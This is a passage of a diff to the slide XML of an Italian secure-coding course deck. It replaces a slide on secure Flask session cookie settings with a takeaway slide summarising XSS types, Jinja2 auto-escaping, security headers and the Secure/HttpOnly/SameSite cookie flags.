+            <a:ext cx="1188720" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4301,7 +5313,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="164592"/>
-            <a:ext cx="10058400" cy="502920"/>
+            <a:ext cx="10972800" cy="502920"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4322,27 +5334,27 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Cookie sicuri</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="Rectangle 3"/>
+              <a:t>📌  Cosa portare a casa</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Oval 3"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="9875520" y="164592"/>
-            <a:ext cx="2103120" cy="457200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
+            <a:off x="914400" y="1440180"/>
+            <a:ext cx="777240" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
             <a:avLst/>
           </a:prstGeom>
           <a:solidFill>
-            <a:srgbClr val="06A77D"/>
+            <a:srgbClr val="00A0B0"/>
           </a:solidFill>
           <a:ln>
             <a:noFill/>
@@ -4378,8 +5390,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="9875520" y="182880"/>
-            <a:ext cx="2103120" cy="457200"/>
+            <a:off x="914400" y="1440180"/>
+            <a:ext cx="777240" cy="777240"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4394,37 +5406,39 @@
           <a:p>
             <a:pPr algn="ctr"/>
             <a:r>
-              <a:rPr sz="1200" b="1" i="0">
+              <a:rPr sz="2800" b="1" i="0">
                 <a:solidFill>
                   <a:srgbClr val="FFFFFF"/>
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>✅ PYTHON</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="Rectangle 5"/>
+              <a:t>1</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="Rounded Rectangle 5"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="457200" y="1097280"/>
-            <a:ext cx="11247120" cy="4572000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
+            <a:off x="2011680" y="1440180"/>
+            <a:ext cx="9144000" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst>
+              <a:gd name="adj" fmla="val 8000"/>
+            </a:avLst>
           </a:prstGeom>
           <a:solidFill>
-            <a:srgbClr val="F1F4F8"/>
+            <a:srgbClr val="FBFBFD"/>
           </a:solidFill>
-          <a:ln>
+          <a:ln w="19050">
             <a:solidFill>
-              <a:srgbClr val="06A77D"/>
+              <a:srgbClr val="00A0B0"/>
             </a:solidFill>
           </a:ln>
         </p:spPr>
@@ -4458,8 +5472,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="640080" y="1280160"/>
-            <a:ext cx="10972800" cy="4206240"/>
+            <a:off x="2286000" y="1440180"/>
+            <a:ext cx="8686800" cy="777240"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4467,202 +5481,77 @@
           <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l"/>
             <a:r>
-              <a:rPr sz="1400" b="0" i="0">
+              <a:rPr sz="1800" b="0" i="0">
                 <a:solidFill>
                   <a:srgbClr val="1A1A2E"/>
                 </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># Configurazione Flask</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>app.config.update(</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>    SESSION_COOKIE_SECURE=True,      # Solo HTTPS</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>    SESSION_COOKIE_HTTPONLY=True,     # JS NON può leggerlo (anti-XSS)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>    SESSION_COOKIE_SAMESITE="Lax",    # Anti-CSRF</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>    PERMANENT_SESSION_LIFETIME=3600,</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t/>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># Risultato nel browser:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t># Set-Cookie: session=abc123;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>#             Secure;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>#             HttpOnly;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>#             SameSite=Lax;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>#             Path=/;</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr algn="l"/>
-            <a:r>
-              <a:rPr sz="1400" b="0" i="0">
-                <a:solidFill>
-                  <a:srgbClr val="1A1A2E"/>
-                </a:solidFill>
-                <a:latin typeface="Consolas"/>
-              </a:rPr>
-              <a:t>#             Max-Age=3600</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="TextBox 7"/>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>XSS = JavaScript dell'attaccante eseguito nel browser</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="Oval 7"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="914400" y="2354580"/>
+            <a:ext cx="777240" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00A0B0"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="TextBox 8"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="457200" y="5852160"/>
-            <a:ext cx="11247120" cy="457200"/>
+            <a:off x="914400" y="2354580"/>
+            <a:ext cx="777240" cy="777240"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4670,27 +5559,589 @@
           <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="t">
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="2800" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>2</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2011680" y="2354580"/>
+            <a:ext cx="9144000" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst>
+              <a:gd name="adj" fmla="val 8000"/>
+            </a:avLst>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="FBFBFD"/>
+          </a:solidFill>
+          <a:ln w="19050">
+            <a:solidFill>
+              <a:srgbClr val="00A0B0"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="11" name="TextBox 10"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2286000" y="2354580"/>
+            <a:ext cx="8686800" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
             <a:pPr algn="l"/>
             <a:r>
-              <a:rPr sz="1400" b="1" i="1">
-                <a:solidFill>
-                  <a:srgbClr val="06A77D"/>
-                </a:solidFill>
-                <a:latin typeface="Calibri"/>
-              </a:rPr>
-              <a:t>✓  3 attributi + 1 configurazione = -90% rischio di session hijacking</a:t>
+              <a:rPr sz="1800" b="0" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="1A1A2E"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>3 tipi: Reflected, Stored (peggiore), DOM-based</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="12" name="Oval 11"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="914400" y="3268980"/>
+            <a:ext cx="777240" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00A0B0"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="13" name="TextBox 12"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="914400" y="3268980"/>
+            <a:ext cx="777240" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="2800" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>3</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="14" name="Rounded Rectangle 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2011680" y="3268980"/>
+            <a:ext cx="9144000" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst>
+              <a:gd name="adj" fmla="val 8000"/>
+            </a:avLst>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="FBFBFD"/>
+          </a:solidFill>
+          <a:ln w="19050">
+            <a:solidFill>
+              <a:srgbClr val="00A0B0"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="15" name="TextBox 14"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2286000" y="3268980"/>
+            <a:ext cx="8686800" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1800" b="0" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="1A1A2E"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>Jinja2 fa escape di default — NON disabilitarlo</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="16" name="Oval 15"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="914400" y="4183380"/>
+            <a:ext cx="777240" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00A0B0"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="17" name="TextBox 16"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="914400" y="4183380"/>
+            <a:ext cx="777240" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="2800" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>4</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2011680" y="4183380"/>
+            <a:ext cx="9144000" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst>
+              <a:gd name="adj" fmla="val 8000"/>
+            </a:avLst>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="FBFBFD"/>
+          </a:solidFill>
+          <a:ln w="19050">
+            <a:solidFill>
+              <a:srgbClr val="00A0B0"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="19" name="TextBox 18"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2286000" y="4183380"/>
+            <a:ext cx="8686800" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1800" b="0" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="1A1A2E"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>6 header HTTP, configurazione semplice, difese potenti</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="20" name="Oval 19"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="914400" y="5097780"/>
+            <a:ext cx="777240" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="ellipse">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00A0B0"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="21" name="TextBox 20"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="914400" y="5097780"/>
+            <a:ext cx="777240" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr sz="2800" b="1" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>5</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="22" name="Rounded Rectangle 21"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2011680" y="5097780"/>
+            <a:ext cx="9144000" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst>
+              <a:gd name="adj" fmla="val 8000"/>
+            </a:avLst>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="FBFBFD"/>
+          </a:solidFill>
+          <a:ln w="19050">
+            <a:solidFill>
+              <a:srgbClr val="00A0B0"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="23" name="TextBox 22"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2286000" y="5097780"/>
+            <a:ext cx="8686800" cy="777240"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="45720" rIns="45720" tIns="18288" bIns="18288" anchor="ctr">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr sz="1800" b="0" i="0">
+                <a:solidFill>
+                  <a:srgbClr val="1A1A2E"/>
+                </a:solidFill>
+                <a:latin typeface="Calibri"/>
+              </a:rPr>
+              <a:t>Cookie sessione: Secure + HttpOnly + SameSite (sempre)</a:t>
             </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:cxnSp>
         <p:nvCxnSpPr>
-          <p:cNvPr id="9" name="Connector 8"/>
+          <p:cNvPr id="24" name="Connector 23"/>
           <p:cNvCxnSpPr/>
           <p:nvPr/>
         </p:nvCxnSpPr>
@@ -4725,14 +6176,14 @@
       </p:cxnSp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="10" name="TextBox 9"/>
+          <p:cNvPr id="25" name="TextBox 24"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="6473952"/>
-            <a:ext cx="7315200" cy="320040"/>
+            <a:ext cx="7315200" cy="292608"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4753,21 +6204,21 @@
                 </a:solidFill>
                 <a:latin typeface="Calibri"/>
               </a:rPr>
-              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="11" name="TextBox 10"/>
+              <a:t>Secure Coding · Corso IFTS STEM · A. Manneschi · 2024/2025</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="26" name="TextBox 25"/>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
